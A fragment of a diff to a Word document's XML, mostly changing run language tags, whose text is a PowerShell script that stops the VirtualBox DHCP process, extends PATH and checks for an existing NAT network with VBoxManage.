+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>#------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Stop DHCP server process if it's running</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dhcpProcess</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = Get-Process -Name </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VBoxDHCP</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ErrorAction</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -5218,471 +4820,279 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>installation</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> directory </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>to</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>the</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>SilentlyContinue</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>if ($</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dhcpProcess</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    Write-Host "Stopping VirtualBox DHCP server..."</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Stop-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Process</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -Name </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>VBoxDHCP</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -Force</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Start-Sleep -Seconds </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>PATH environment</w:t>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>2  #</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>variable</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>to</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> make </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>things</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>easier</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>$</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Env:Path</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> += ";C:\Program Files\Oracle\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>VirtualBox</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>\"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>#------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t># 1. Setup Nat Network</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>#------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># Stop DHCP server </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>process</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>if</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>it's</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> running</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>$</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>dhcpProcess</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = Get-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Process</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -Name </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>VBoxDHCP</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>ErrorAction</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>SilentlyContinue</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>if</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ($</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>dhcpProcess</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Wait for the process to terminate</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Remove existing NAT network if needed</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t># Check if the NAT network exists</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t xml:space="preserve">if (VBoxManage.exe </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>natnetwork</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> list | Select-String -Pattern $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>NATNetworkName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>) {</w:t>
       </w:r>
@@ -5692,551 +5102,40 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    Write-Host "Stopping </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>VirtualBox</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> DHCP server..."</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    Stop-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Process</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -Name </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>VBoxDHCP</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -Force</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    Start-Sleep -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Seconds</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>2  #</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Wait</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>for</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>the</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>process</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>to</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>terminate</w:t>
-      </w:r>
